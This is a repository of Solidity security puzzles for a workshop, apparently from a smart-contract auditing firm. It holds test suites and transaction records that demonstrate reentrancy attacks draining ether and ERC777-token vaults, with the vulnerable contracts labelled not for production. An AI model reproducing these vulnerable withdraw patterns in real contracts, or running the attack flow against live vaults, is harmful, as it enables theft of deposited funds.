SPDX-License-Identifier: GPL-3.0 2 | /** Do NOT use this code in production ** 3 | __ __ _ _ _____ _ _ _ 4 | \ \ / / (_| | / ____| | | | | (_) 5 | \ \ / ___ _ __ _| | ___ __ _ | (___ ___ | |_ _| |_ _ ___ _ __ ___ 6 | \ \/ / _ | '__| | |/ _ \ / _` | \___ \ / _ \| | | | | __| |/ _ \| '_ \/ __| 7 | \ | __| | | | | (_) | (_| | ____) | (_) | | |_| | |_| | (_) | | | \__ \ 8 | \/ \___|_| |_|_|\___/ \__, | |_____/ \___/|_|\__,_|\__|_|\___/|_| |_|___/ 9 | __/ | 10 | |___/ 11 | 12 | Verilog Solutions Inc. https://www.verilog.solutions 13 | Verilog is a full-stack web3 security firm, covering smart contract auditing, 14 | validator operations, venture investment, and incubation. 15 | Glad to prepare and present the materials for Game Day Remix in DevConnect Amsterdam! 16 | */ 17 | 18 | pragma solidity 0.8.6; 19 | import "@openzeppelin/contracts/token/ERC20/ERC20.sol"; 20 | 21 | /// @title Token 22 | /// @notice Test token. 
Do not use it in productions 23 | /// @author Verilog Solutions 24 | contract Token is ERC20 { 25 | /** @param initialSupply Amount minted to the deployer. */ constructor(uint256 initialSupply) ERC20("TEST Token", "T-Token") { 26 | _mint(msg.sender, initialSupply); 27 | } 28 | 29 | /** @notice Mints msg.value token units to the caller (1:1 with the wei sent). */ function buy() external payable { 30 | // let's do a 1:1 exchange from eth to pensionToken 31 | _mint(msg.sender, msg.value); 32 | } 33 | 34 | // all other functions (like transfer(), balanceOf() are inherited from ERC20.) 35 | } 36 | -------------------------------------------------------------------------------- /contracts/puzzle3/miscs/Whitelistable.sol: -------------------------------------------------------------------------------- 1 | // SPDX-License-Identifier: GPL-3.0 2 | /** Do NOT use this code in production ** 3 | __ __ _ _ _____ _ _ _ 4 | \ \ / / (_| | / ____| | | | | (_) 5 | \ \ / ___ _ __ _| | ___ __ _ | (___ ___ | |_ _| |_ _ ___ _ __ ___ 6 | \ \/ / _ | '__| | |/ _ \ / _` | \___ \ / _ \| | | | | __| |/ _ \| '_ \/ __| 7 | \ | __| | | | | (_) | (_| | ____) | (_) | | |_| | |_| | (_) | | | \__ \ 8 | \/ \___|_| |_|_|\___/ \__, | |_____/ \___/|_|\__,_|\__|_|\___/|_| |_|___/ 9 | __/ | 10 | |___/ 11 | 12 | Verilog Solutions Inc. https://www.verilog.solutions 13 | Verilog is a full-stack web3 security firm, covering smart contract auditing, 14 | validator operations, venture investment, and incubation. 15 | Glad to prepare and present the materials for Game Day Remix in DevConnect Amsterdam! 
16 | */ 17 | 18 | pragma solidity 0.8.6; 19 | 20 | import "@openzeppelin/contracts/access/Ownable.sol"; 21 | 22 | /** @title Whitelistable @notice Owner-managed allowlist of addresses, plus a modifier that restricts a function to listed callers. */ abstract contract Whitelistable is Ownable { 23 | mapping(address => bool) public whitelist; 24 | 25 | event WhitelistChanged(address user, bool whitelisted); 26 | 27 | /** @dev Reverts unless msg.sender is marked true in `whitelist`. The check is on the immediate caller only; it says nothing about who called that caller. */ modifier onlyWhitelist() { 28 | // solhint-disable-next-line reason-string 29 | require(whitelist[msg.sender], "Whitelistable: caller not whitelisted"); 30 | _; 31 | } 32 | 33 | /** @notice Marks `_user` as whitelisted and emits WhitelistChanged; owner only. */ function addToWhitelist(address _user) external onlyOwner { 34 | whitelist[_user] = true; 35 | emit WhitelistChanged(_user, true); 36 | } 37 | 38 | /** @notice Clears the whitelist flag of `_user` and emits WhitelistChanged; owner only. */ function removeFromWhitelist(address _user) external onlyOwner { 39 | whitelist[_user] = false; 40 | emit WhitelistChanged(_user, false); 41 | } 42 | } 43 | -------------------------------------------------------------------------------- /hardhat.config.js: -------------------------------------------------------------------------------- 1 | require("@nomiclabs/hardhat-waffle"); 2 | 3 | /** 4 | * @type import('hardhat/config').HardhatUserConfig 5 | */ 6 | module.exports = { 7 | solidity: "0.8.6", 8 | 9 | paths: { 10 | sources: "./contracts", 11 | tests: "./tests", 12 | }, 13 | }; 14 | -------------------------------------------------------------------------------- /package.json: -------------------------------------------------------------------------------- 1 | { 2 | "name": "Soldity-Puzzles", 3 | "author": "Verilog Solutions Inc", 4 | "license": "GPL-3.0", 5 | "scripts": { 6 | "compile": "hardhat compile", 7 | "clean": "hardhat clean", 8 | "format": "prettier --write \"./**/*.{ts,js,sol}\"" 9 | }, 10 | "dependencies": { 11 | "@nomiclabs/hardhat-ethers": "^2.0.5", 12 | "@nomiclabs/hardhat-waffle": "^2.0.3", 13 | "@openzeppelin/contracts": "^4.5.0", 14 | "@openzeppelin/test-helpers": "^0.5.15", 15 | "chai": "^4.3.6", 16 | "ethereum-waffle": "^3.4.4", 17 | "ethers": "^5.6.3", 18 | "hardhat": "^2.9.3" 19 | }, 20 | "devDependencies": { 21 | "@nomiclabs/hardhat-waffle": 
"^2.0.3", 22 | "chai": "^4.3.6", 23 | "hardhat": "^2.9.3", 24 | "prettier": "^2.6.2", 25 | "prettier-plugin-solidity": "^1.0.0-beta.19" 26 | } 27 | } 28 | -------------------------------------------------------------------------------- /remix-compiler.config.js: -------------------------------------------------------------------------------- 1 | module.exports = { 2 | solidity: "0.8.6", 3 | settings: { 4 | optimizer: { 5 | enabled: false, 6 | runs: 200, 7 | }, 8 | }, 9 | }; 10 | -------------------------------------------------------------------------------- /tests/js_tests/puzzle1.test.js: -------------------------------------------------------------------------------- 1 | /** Do NOT use this code in production ** 2 | __ __ _ _ _____ _ _ _ 3 | \ \ / / (_| | / ____| | | | | (_) 4 | \ \ / ___ _ __ _| | ___ __ _ | (___ ___ | |_ _| |_ _ ___ _ __ ___ 5 | \ \/ / _ | '__| | |/ _ \ / _` | \___ \ / _ \| | | | | __| |/ _ \| '_ \/ __| 6 | \ | __| | | | | (_) | (_| | ____) | (_) | | |_| | |_| | (_) | | | \__ \ 7 | \/ \___|_| |_|_|\___/ \__, | |_____/ \___/|_|\__,_|\__|_|\___/|_| |_|___/ 8 | __/ | 9 | |___/ 10 | 11 | Verilog Solutions Inc. https://www.verilog.solutions 12 | Verilog is a full-stack web3 security firm, covering smart contract auditing, 13 | validator operations, venture investment, and incubation. 14 | Glad to prepare and present the materials for Game Day Remix in DevConnect Amsterdam! 
*/

const { expect } = require("chai");
const { ethers } = require("hardhat");

/**
 * Puzzle 1: the ether vault `Victim1`, exercised by ordinary depositors and by the
 * `Attacker1` contract.
 *
 * Tests 1-3 pin the intended behaviour (initial funding, deposit, withdraw). The last test
 * documents the reentrancy weakness the puzzle is built around: it passes only while the
 * caller can take out more than it put in.
 *
 * Review note: Victim1's source is not part of this file. The usual fixes for this class are
 * to clear the depositor's recorded amount before ether is sent (checks-effects-interactions)
 * or to put withdraw behind a reentrancy lock such as OpenZeppelin's ReentrancyGuard. After
 * such a fix the "Attack" test is expected to fail and should be inverted into a
 * must-not-gain regression test.
 */
describe("Puzzle 1", function () {
  // Victim1 is seeded with 1 ether; every deposit in this suite is 0.5 ether.
  const initialBalance = ethers.utils.parseUnits("1.0", "ether");
  const depositAmount = ethers.utils.parseUnits("0.5", "ether");

  let victim;
  let attacker;
  let owner;
  let addr1;
  let addr2;

  // Ether balance of an address as reported by the Hardhat provider.
  const etherBalanceOf = (address) => ethers.provider.getBalance(address);

  // Fresh contracts for every test, so balances never leak between cases.
  beforeEach(async function () {
    [owner, addr1, addr2] = await ethers.getSigners();

    const victimFactory = await ethers.getContractFactory("Victim1");
    victim = await victimFactory.deploy({ value: initialBalance });

    const attackerFactory = await ethers.getContractFactory("Attacker1");
    attacker = await attackerFactory.deploy(victim.address);
  });

  it("Test1: Victim should be initialize with proper initial fund. ", async function () {
    expect(await etherBalanceOf(victim.address)).to.equal(initialBalance);
  });

  it("Test2: Legit user can store ether into Victim.", async function () {
    const userBefore = await addr1.getBalance();
    const victimBefore = await etherBalanceOf(victim.address);

    await victim.connect(addr1).deposit({ value: depositAmount });

    const userAfter = await addr1.getBalance();
    const victimAfter = await etherBalanceOf(victim.address);

    // The user also pays gas, so the user's balance drops by at least the deposit.
    const userSpent = userBefore.sub(userAfter);
    expect(userSpent).to.gte(depositAmount);

    const victimGained = victimAfter.sub(victimBefore);
    expect(victimGained).to.equal(depositAmount);
  });

  it("Test3: Legit user can withdraw ether from Victim.", async function () {
    // A withdrawal needs a prior deposit from the same account.
    await victim.connect(addr1).deposit({ value: depositAmount });
    const victimBefore = await etherBalanceOf(victim.address);

    await victim.connect(addr1).withdraw(addr1.address);
    const victimAfter = await etherBalanceOf(victim.address);

    // An honest withdrawal returns exactly what was deposited.
    const victimPaidOut = victimBefore.sub(victimAfter);
    expect(victimPaidOut).to.equal(depositAmount);
  });

  it("Attack: Attacker can withdraw ether from Victim.", async function () {
    const victimBefore = await etherBalanceOf(victim.address);
    const attackerBefore = await etherBalanceOf(attacker.address);

    // Victim holds 1 ether and the attacker contract deposits 0.5 ether. Per the original
    // author, withdraw is re-entered twice (three withdrawals in total), which drains the
    // Victim; the console logs show each step.
    await attacker.connect(addr2).attack({ value: depositAmount });

    const victimAfter = await etherBalanceOf(victim.address);
    const attackerAfter = await etherBalanceOf(attacker.address);

    // About `above` and `below`:
    // https://ethereum-waffle.readthedocs.io/en/latest/matchers.html#bignumbers
    const attackerGained = attackerAfter.sub(attackerBefore);
    // The attacker contract ends up with more than it deposited ...
    expect(attackerGained).to.above(depositAmount);
    // ... and the Victim is left with less than its pre-attack balance minus one deposit.
    const victimFloor = victimBefore.sub(depositAmount);
    expect(victimAfter).to.below(victimFloor);
  });
});

--------------------------------------------------------------------------------
/tests/js_tests/puzzle2.test.js:
--------------------------------------------------------------------------------
/** Do NOT use this code in production **
__ __ _ _ _____ _ _ _
\ \ / / (_| | / ____| | | | | (_)
\ \ / ___ _ __ _| | ___ __ _ | (___ ___ | |_ _| |_ _ ___ _ __ ___
\ \/ / _ | '__| | |/ _ \ / _` | \___ \ / _ \| | | | | __| |/ _ \| '_ \/ __|
\ | __| | | | | (_) | (_| | ____) | (_) | | |_| | |_| | (_) | | | \__ \
\/ \___|_| |_|_|\___/ \__, | |_____/ \___/|_|\__,_|\__|_|\___/|_| |_|___/
__/ |
|___/

Verilog Solutions Inc. https://www.verilog.solutions
Verilog is a full-stack web3 security firm, covering smart contract auditing,
validator operations, venture investment, and incubation.
Glad to prepare and present the materials for Game Day Remix in DevConnect Amsterdam!
*/

const { expect } = require("chai");
const { ethers } = require("hardhat");

/**
 * Puzzle 2: the token vault `Victim2` backed by `ERC777TestToken`, exercised by ordinary
 * depositors and by the `Attacker2` contract.
 *
 * Tests 1-3 pin the intended behaviour; the last test documents that the attacker contract
 * ends up with more tokens than it deposited.
 *
 * Review note: the ABIs in tx_records/puzzle2.json show a `tokensReceived` callback on both
 * Victim2 and Attacker2, so the over-withdrawal presumably rides on the token's receive
 * hook; confirm against Victim2.sol. The usual fix is the same as for ether reentrancy:
 * zero the depositor's recorded amount before the token transfer, or lock withdraw against
 * re-entry. After such a fix the "Attack" test should be inverted into a regression test.
 */
describe("Puzzle 2", function () {
  // 18-decimal token units: the victim starts with 10 tokens, each user works with 5.
  const initialSupply = ethers.utils.parseUnits("10.0", 18);
  const depositAmount = ethers.utils.parseUnits("5.0", 18);

  let token;
  let victim;
  let attacker;
  let owner;
  let addr1;
  let addr2;

  beforeEach(async function () {
    [owner, addr1, addr2] = await ethers.getSigners();

    const tokenFactory = await ethers.getContractFactory("ERC777TestToken");
    token = await tokenFactory.deploy(initialSupply);

    const victimFactory = await ethers.getContractFactory("Victim2");
    victim = await victimFactory.deploy(token.address);

    // Move the owner's whole token balance into the victim contract.
    const ownerTokens = await token.balanceOf(owner.address);
    await token.transfer(victim.address, ownerTokens);

    const attackerFactory = await ethers.getContractFactory("Attacker2");
    attacker = await attackerFactory.deploy(victim.address, token.address);

    // Both users buy tokens, paying `depositAmount` wei each.
    await token.connect(addr1).buy(addr1.address, { value: depositAmount });
    await token.connect(addr2).buy(addr2.address, { value: depositAmount });
  });

  it("Test1: Victim should be initialize with proper initial fund (in token). ", async function () {
    expect(await token.balanceOf(victim.address)).to.equal(initialSupply);
  });

  it("Test2: Legit user can deposit token to Victim. ", async function () {
    const victimBefore = await token.balanceOf(victim.address);
    const userBefore = await token.balanceOf(addr1.address);

    // The vault pulls the tokens, so the user approves it first.
    await token.connect(addr1).approve(victim.address, depositAmount);
    await victim.connect(addr1).deposit(depositAmount);

    const victimAfter = await token.balanceOf(victim.address);
    const userAfter = await token.balanceOf(addr1.address);

    const victimGained = victimAfter.sub(victimBefore);
    expect(victimGained).to.equal(depositAmount);
    const userSpent = userBefore.sub(userAfter);
    expect(userSpent).to.equal(depositAmount);
    // The vault's own ledger must agree with the token balances.
    expect(await victim.amounts(addr1.address)).to.equal(depositAmount);
  });

  it("Test3: Legit user can withdraw token from Victim. ", async function () {
    // A withdrawal needs a prior deposit from the same account.
    await token.connect(addr1).approve(victim.address, depositAmount);
    await victim.connect(addr1).deposit(depositAmount);

    const victimBefore = await token.balanceOf(victim.address);
    const userBefore = await token.balanceOf(addr1.address);

    await victim.connect(addr1).withdraw(addr1.address);

    const victimAfter = await token.balanceOf(victim.address);
    const userAfter = await token.balanceOf(addr1.address);

    const victimPaidOut = victimBefore.sub(victimAfter);
    expect(victimPaidOut).to.equal(depositAmount);
    const userReceived = userAfter.sub(userBefore);
    expect(userReceived).to.equal(depositAmount);
    // An honest withdrawal leaves nothing recorded for the user.
    expect(await victim.amounts(addr1.address)).to.equal(0);
  });

  it("Attack: Attacker can withdraw more token from Victim than he deposits.", async function () {
    const victimBefore = await token.balanceOf(victim.address);
    const attackerBefore = await token.balanceOf(attacker.address);

    // addr2 grants the attacker contract an allowance; attack() then spends addr2's
    // tokens (AGT in the original comment).
    await token.connect(addr2).approve(attacker.address, depositAmount);
    await attacker.connect(addr2).attack(depositAmount);

    const victimAfter = await token.balanceOf(victim.address);
    const attackerAfter = await token.balanceOf(attacker.address);

    // About `above` and `below`:
    // https://ethereum-waffle.readthedocs.io/en/latest/matchers.html#bignumbers
    const attackerGained = attackerAfter.sub(attackerBefore);
    // The attacker contract ends up with more than it deposited ...
    expect(attackerGained).to.above(depositAmount);
    // ... and the victim loses more than that single deposit would justify.
    const victimFloor = victimBefore.sub(depositAmount);
    expect(victimAfter).to.below(victimFloor);
  });
});

--------------------------------------------------------------------------------
/tests/solidity_tests/puzzle1_test.sol:
--------------------------------------------------------------------------------
// SPDX-License-Identifier: GPL-3.0
/** Do NOT use this code in production **
__ __ _ _ _____ _ _ _
\ \ / / (_| | / ____| | | | | (_)
\ \ / ___ _ __ _| | ___ __ _ | (___ ___ | |_ _| |_ _ ___ _ __ ___
\ \/ / _ | '__| | |/ _ \ / _` | \___ \ / _ \| | | | | __| |/ _ \| '_ \/ __|
\ | __| | | | | (_) | (_| | ____) | (_) | | |_| | |_| | (_) | | | \__ \
\/ \___|_| |_|_|\___/ \__, | |_____/ \___/|_|\__,_|\__|_|\___/|_| |_|___/
__/ |
|___/

Verilog Solutions Inc. https://www.verilog.solutions
Verilog is a full-stack web3 security firm, covering smart contract auditing,
validator operations, venture investment, and incubation.
Glad to prepare and present the materials for Game Day Remix in DevConnect Amsterdam!
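*/

pragma solidity ^0.8.0;

// This import is automatically injected by Remix
import "remix_tests.sol";

// This import is required to use custom transaction context
// Although it may fail compilation in 'Solidity Compiler' plugin
// But it will work fine in 'Solidity Unit Testing' plugin
import "remix_accounts.sol";
//
import "hardhat/console.sol";
import "../../contracts/puzzle1/Attacker1.sol";
import "../../contracts/puzzle1/Victim1.sol";
import "../../contracts/puzzle2/token/ERC777TestToken.sol";

// File name has to end with '_test.sol', this file can contain more than one testSuite contracts
//
// Remix unit-test suite for puzzle 1. It deploys Victim1 with 1 ether and an Attacker1 bound to
// it, then checks (a) the initial funding and (b) that the attacker contract gains more ether
// than it deposits.
//
// Review note: (b) passes only while Victim1 can be over-withdrawn. Victim1's source is not part
// of this file; once withdraw is hardened (recorded amount cleared before the ether transfer, or
// a reentrancy lock), `attack` is expected to fail and should be inverted into a regression test.
contract puzzle1_test {
    Victim1 victim;
    Attacker1 attacker;

    /// 'beforeAll' runs before all other tests
    /// More special functions are: 'beforeEach', 'beforeAll', 'afterEach' & 'afterAll'
    /// The `#sender` / `#value` lines below are read by the Remix test runner (custom transaction
    /// context): the call is sent from account-0 with 1 ether attached.
    /// #sender: account-0
    /// #value: 1000000000000000000
    function beforeAll() public payable {
        // Forward the attached ether so Victim1 starts out funded.
        victim = new Victim1{ value: msg.value }();
        attacker = new Attacker1(address(victim));
    }

    /// Test1: Victim1 should be initialize with proper initial fund.
    function test_DAOVictim_Initalize() public {
        // The failure message now names the value that is actually checked (1 ether).
        Assert.ok(address(victim).balance == 1 ether, "victim contract should be initialized with 1 ether");
    }

    /// Attack: Attacker can withdraw more ether from Victim1.
    /// Sent from account-1 with 0.5 ether attached (see the tags below).
    /// #sender: account-1
    /// #value: 500000000000000000
    function attack() public payable {
        uint256 depositAmount = msg.value; // 0.5 ether

        uint256 beforeBalanceAttacker = address(attacker).balance;

        attacker.attack{ value: depositAmount }();

        uint256 afterBalanceAttacker = address(attacker).balance;

        // With 0.8 checked arithmetic the subtraction reverts if the attacker contract ended up
        // with less ether than before, so a failed run can show up as a revert instead of an
        // assertion message.
        Assert.greaterThan(
            afterBalanceAttacker - beforeBalanceAttacker,
            depositAmount,
            "Attacker should be able to withdraw more funds"
        );
    }
}

--------------------------------------------------------------------------------
/tests/solidity_tests/puzzle2_test.sol:
--------------------------------------------------------------------------------
// SPDX-License-Identifier: GPL-3.0
/** Do NOT use this code in production **
__ __ _ _ _____ _ _ _
\ \ / / (_| | / ____| | | | | (_)
\ \ / ___ _ __ _| | ___ __ _ | (___ ___ | |_ _| |_ _ ___ _ __ ___
\ \/ / _ | '__| | |/ _ \ / _` | \___ \ / _ \| | | | | __| |/ _ \| '_ \/ __|
\ | __| | | | | (_) | (_| | ____) | (_) | | |_| | |_| | (_) | | | \__ \
\/ \___|_| |_|_|\___/ \__, | |_____/ \___/|_|\__,_|\__|_|\___/|_| |_|___/
__/ |
|___/

Verilog Solutions Inc. https://www.verilog.solutions
Verilog is a full-stack web3 security firm, covering smart contract auditing,
validator operations, venture investment, and incubation.
Glad to prepare and present the materials for Game Day Remix in DevConnect Amsterdam!
*/

pragma solidity ^0.8.0;

// This import is automatically injected by Remix
import "remix_tests.sol";

// This import is required to use custom transaction context
// Although it may fail compilation in 'Solidity Compiler' plugin
// But it will work fine in 'Solidity Unit Testing' plugin
import "remix_accounts.sol";
//
import "hardhat/console.sol";
import "../../contracts/puzzle2/token/ERC777TestToken.sol";
import "../../contracts/puzzle2/Victim2.sol";
import "../../contracts/puzzle2/Attacker2.sol";

// File name has to end with '_test.sol', this file can contain more than one testSuite contracts
//
// Remix unit-test suite for puzzle 2. It deploys the test token, a Victim2 vault and an
// Attacker2 bound to both, then checks that the attacker contract receives more tokens than the
// amount it was asked to use.
//
// Review note: as in puzzle 1, `attack` passes only while Victim2 can be over-withdrawn; after a
// fix it should be inverted into a regression test.
contract puzzle2_test {
    ERC777TestToken token;
    Victim2 victim;
    Attacker2 attacker;

    /// 'beforeAll' runs before all other tests
    /// More special functions are: 'beforeEach', 'beforeAll', 'afterEach' & 'afterAll'
    /// NOTE(review): the 100 wei attached here is not forwarded to any of the deployments below.
    /// #sender: account-0
    /// #value: 100
    function beforeAll() public payable {
        // Original comment: "token is minted to account-0".
        // NOTE(review): the initial supply passed here is 0; confirm against ERC777TestToken's
        // constructor what, if anything, is minted at deployment.
        token = new ERC777TestToken(0);

        victim = new Victim2(address(token));
        attacker = new Attacker2(address(victim), address(token));
    }

    /// Attacker: Attacker can withdraw more ERC777TestToken from Victim2 than he deposits
    /// Sent from account-0 with 11 ether attached (see the tags below).
    /// #sender: account-0
    /// #value: 11000000000000000000
    function attack() public payable {
        uint256 victimDeposit = 10e18;
        uint256 amount = 1e18;

        // Buy tokens for this test contract, then fund the victim with 10 of them.
        // The return values of approve are not checked here.
        token.buy{ value: msg.value }(address(this));
        token.approve(address(attacker), amount);
        token.approve(address(victim), victimDeposit);
        victim.deposit(victimDeposit);

        // attack
        uint256 balanceBeforeAttacker = token.balanceOf(address(attacker));

        attacker.attack(amount);

        uint256 balanceAfterAttacker = token.balanceOf(address(attacker));

        // Checked arithmetic: a net loss for the attacker contract reverts here rather than
        // reaching the assertion.
        Assert.greaterThan(
            balanceAfterAttacker - balanceBeforeAttacker,
            amount,
            "attacker should revceive more token"
        );
    }
}

--------------------------------------------------------------------------------
/tx_records/README.md:
--------------------------------------------------------------------------------
# What Is Included in Records?

## Puzzle1 Record

```
==== Setting ====
0. Address1 create DAOVictim with value = 3 ether;
1. Address2 create DAOAttacker;
==== Legit User ====
2. Address1 call deposit() in DAOVictim with value = 1 ether;
3. Address1 call withdraw(address to) in DAOVictim with parameter: address to = address(Address1);
==== Attacker ====
4. Address2 call attack() in DAOAttacker with value = 1 ether;
```

## Puzzle2 Record

```
==== Setting ====
0. erc777Token = ERC777Token.deploy(initialSupply);
1. victim = Victim.deploy(erc777Token.address);
2. erc777Token.connect(owner).transfer(victim.address, initialSupply);
3. attacker = Attacker.deploy(victim.address, erc777Token.address);
4. erc777Token.connect(addr1).buy({ value: depositAmount });
5. erc777Token.connect(addr2).buy({ value: depositAmount });
==== Legit User ====
6. erc777Token.connect(addr1).approve(victim.address, depositAmount);
7. victim.connect(addr1).deposit(depositAmount);
8. victim.connect(addr1).withdraw(addr1.address);
==== Attacker ====
9. erc777Token.connect(addr2).approve(attacker.address, depositAmount);
10.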
attacker.connect(addr2).attack(depositAmount); 33 | ``` 34 | -------------------------------------------------------------------------------- /tx_records/puzzle1.json: -------------------------------------------------------------------------------- 1 | { 2 | "accounts": { 3 | "account{0}": "0x5B38Da6a701c568545dCfcB03FcB875f56beddC4", 4 | "account{1}": "0xAb8483F64d9C6d1EcF9b849Ae677dD3315835cb2" 5 | }, 6 | "linkReferences": {}, 7 | "transactions": [ 8 | { 9 | "timestamp": 1650162569424, 10 | "record": { 11 | "value": "3000000000000000000", 12 | "parameters": [], 13 | "abi": "0x5628658acaf3b5010d8b3927e0449d78c83ba9792fcc116c75ba833a63dfa7f0", 14 | "contractName": "Victim1", 15 | "bytecode": "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", 16 | "linkReferences": {}, 17 | "name": "", 18 | "inputs": "()", 19 | "type": "constructor", 20 | "from": "account{0}" 21 | } 22 | }, 23 | { 24 | "timestamp": 1650162593412, 25 | "record": { 26 | "value": "0", 27 | "parameters": [ 28 | "created{1650162569424}" 29 | ], 30 | "abi": "0x28e2ec147ccaac8c352ab53bd66b8187d2ab8c0dc4b881cec5748aa81d5051b5", 31 | "contractName": "Attacker1", 32 | "bytecode": "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", 33 | "linkReferences": {}, 34 | "name": "", 35 | "inputs": "(address)", 36 | "type": "constructor", 37 | "from": "account{1}" 38 | } 39 | }, 40 | { 41 | "timestamp": 1650162601974, 42 | "record": { 43 | "value": "1000000000000000000", 44 | "parameters": [], 45 | "to": "created{1650162569424}", 46 | "abi": "0x5628658acaf3b5010d8b3927e0449d78c83ba9792fcc116c75ba833a63dfa7f0", 47 | "name": "deposit", 48 | "inputs": "()", 49 | "type": "function", 50 | "from": "account{0}" 51 | } 52 | }, 53 | { 54 | "timestamp": 1650162608009, 55 | "record": { 56 | "value": "0", 57 | "parameters": [ 58 | "0x5B38Da6a701c568545dCfcB03FcB875f56beddC4" 59 | ], 60 | "to": "created{1650162569424}", 61 | "abi": "0x5628658acaf3b5010d8b3927e0449d78c83ba9792fcc116c75ba833a63dfa7f0", 62 | "name": 
"withdraw", 63 | "inputs": "(address)", 64 | "type": "function", 65 | "from": "account{0}" 66 | } 67 | }, 68 | { 69 | "timestamp": 1650162640115, 70 | "record": { 71 | "value": "1000000000000000000", 72 | "parameters": [], 73 | "to": "created{1650162593412}", 74 | "abi": "0x28e2ec147ccaac8c352ab53bd66b8187d2ab8c0dc4b881cec5748aa81d5051b5", 75 | "name": "attack", 76 | "inputs": "()", 77 | "type": "function", 78 | "from": "account{1}" 79 | } 80 | } 81 | ], 82 | "abis": { 83 | "0x5628658acaf3b5010d8b3927e0449d78c83ba9792fcc116c75ba833a63dfa7f0": [ 84 | { 85 | "inputs": [], 86 | "name": "deposit", 87 | "outputs": [], 88 | "stateMutability": "payable", 89 | "type": "function" 90 | }, 91 | { 92 | "inputs": [], 93 | "stateMutability": "payable", 94 | "type": "constructor" 95 | }, 96 | { 97 | "inputs": [ 98 | { 99 | "internalType": "address", 100 | "name": "to", 101 | "type": "address" 102 | } 103 | ], 104 | "name": "withdraw", 105 | "outputs": [], 106 | "stateMutability": "nonpayable", 107 | "type": "function" 108 | }, 109 | { 110 | "inputs": [ 111 | { 112 | "internalType": "address", 113 | "name": "", 114 | "type": "address" 115 | } 116 | ], 117 | "name": "amounts", 118 | "outputs": [ 119 | { 120 | "internalType": "uint256", 121 | "name": "", 122 | "type": "uint256" 123 | } 124 | ], 125 | "stateMutability": "view", 126 | "type": "function" 127 | } 128 | ], 129 | "0x28e2ec147ccaac8c352ab53bd66b8187d2ab8c0dc4b881cec5748aa81d5051b5": [ 130 | { 131 | "inputs": [], 132 | "name": "attack", 133 | "outputs": [], 134 | "stateMutability": "payable", 135 | "type": "function" 136 | }, 137 | { 138 | "inputs": [ 139 | { 140 | "internalType": "contract IDAOVictim", 141 | "name": "victim_address", 142 | "type": "address" 143 | } 144 | ], 145 | "stateMutability": "nonpayable", 146 | "type": "constructor" 147 | }, 148 | { 149 | "stateMutability": "payable", 150 | "type": "receive" 151 | }, 152 | { 153 | "inputs": [], 154 | "name": "victim", 155 | "outputs": [ 156 | { 157 | "internalType": 
"contract IDAOVictim", 158 | "name": "", 159 | "type": "address" 160 | } 161 | ], 162 | "stateMutability": "view", 163 | "type": "function" 164 | } 165 | ] 166 | } 167 | } -------------------------------------------------------------------------------- /tx_records/puzzle2.json: -------------------------------------------------------------------------------- 1 | { 2 | "accounts": { 3 | "account{0}": "0x5B38Da6a701c568545dCfcB03FcB875f56beddC4", 4 | "account{1}": "0xAb8483F64d9C6d1EcF9b849Ae677dD3315835cb2" 5 | }, 6 | "linkReferences": {}, 7 | "transactions": [ 8 | { 9 | "timestamp": 1650474338320, 10 | "record": { 11 | "value": "0", 12 | "parameters": [ 13 | "10000000000000000000" 14 | ], 15 | "abi": "0x3e91d4a4cb3d9af06253d1e2a6db8ea31b4981cfbf80b7c1a367ad75e462ea98", 16 | "contractName": "ERC777TestToken", 17 | "bytecode": "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", 18 | "linkReferences": {}, 19 | "name": "", 20 | "inputs": "(uint256)", 21 | "type": "constructor", 22 | "from": "account{0}" 23 | } 24 | }, 25 | { 26 | "timestamp": 1650474395581, 27 | "record": { 28 | "value": "0", 29 | "parameters": [ 30 | "created{1650474338320}" 31 | ], 32 | "abi": "0xa394c22e641004cf0bd13bef73528d4f470423a89cad1d16a32bd32435267d4e", 33 | "contractName": "Victim2", 34 | "bytecode": "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", 35 | "linkReferences": {}, 36 | "name": "", 37 | "inputs": "(address)", 38 | "type": "constructor", 39 | "from": "account{0}" 40 | } 41 | }, 42 | { 43 | "timestamp": 1650474439210, 44 | "record": { 45 | "value": "0", 46 | "parameters": [ 47 | "created{1650474395581}", 48 | "10000000000000000000" 49 | ], 50 | "to": "created{1650474338320}", 51 | "abi": "0x3e91d4a4cb3d9af06253d1e2a6db8ea31b4981cfbf80b7c1a367ad75e462ea98", 52 | "name": "transfer", 53 | "inputs": "(address,uint256)", 54 | "type": "function", 55 | "from": "account{0}" 56 | } 57 | }, 58 | { 59 | "timestamp": 1650474514599, 60 | "record": { 61 | "value": "0", 62 | 
"parameters": [ 63 | "created{1650474395581}", 64 | "created{1650474338320}" 65 | ], 66 | "abi": "0xeaf12dbffab8e47aa1b27e4e9d838ee0b6048bf42f57fc6134a598bc42bfc5bd", 67 | "contractName": "Attacker2", 68 | "bytecode": "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", 69 | "linkReferences": {}, 70 | "name": "", 71 | "inputs": "(address,address)", 72 | "type": "constructor", 73 | "from": "account{1}" 74 | } 75 | }, 76 | { 77 | "timestamp": 1650474615350, 78 | "record": { 79 | "value": "5000000000000000000", 80 | "parameters": [ 81 | "0x5B38Da6a701c568545dCfcB03FcB875f56beddC4" 82 | ], 83 | "to": "created{1650474338320}", 84 | "abi": "0x3e91d4a4cb3d9af06253d1e2a6db8ea31b4981cfbf80b7c1a367ad75e462ea98", 85 | "name": "buy", 86 | "inputs": "(address)", 87 | "type": "function", 88 | "from": "account{0}" 89 | } 90 | }, 91 | { 92 | "timestamp": 1650474678830, 93 | "record": { 94 | "value": "5000000000000000000", 95 | "parameters": [ 96 | "0xAb8483F64d9C6d1EcF9b849Ae677dD3315835cb2" 97 | ], 98 | "to": "created{1650474338320}", 99 | "abi": "0x3e91d4a4cb3d9af06253d1e2a6db8ea31b4981cfbf80b7c1a367ad75e462ea98", 100 | "name": "buy", 101 | "inputs": "(address)", 102 | "type": "function", 103 | "from": "account{1}" 104 | } 105 | }, 106 | { 107 | "timestamp": 1650474814976, 108 | "record": { 109 | "value": "0", 110 | "parameters": [ 111 | "created{1650474395581}", 112 | "5000000000000000000" 113 | ], 114 | "to": "created{1650474338320}", 115 | "abi": "0x3e91d4a4cb3d9af06253d1e2a6db8ea31b4981cfbf80b7c1a367ad75e462ea98", 116 | "name": "approve", 117 | "inputs": "(address,uint256)", 118 | "type": "function", 119 | "from": "account{0}" 120 | } 121 | }, 122 | { 123 | "timestamp": 1650474847282, 124 | "record": { 125 | "value": "0", 126 | "parameters": [ 127 | "5000000000000000000" 128 | ], 129 | "to": "created{1650474395581}", 130 | "abi": "0xa394c22e641004cf0bd13bef73528d4f470423a89cad1d16a32bd32435267d4e", 131 | "name": "deposit", 132 | "inputs": "(uint256)", 133 | "type": 
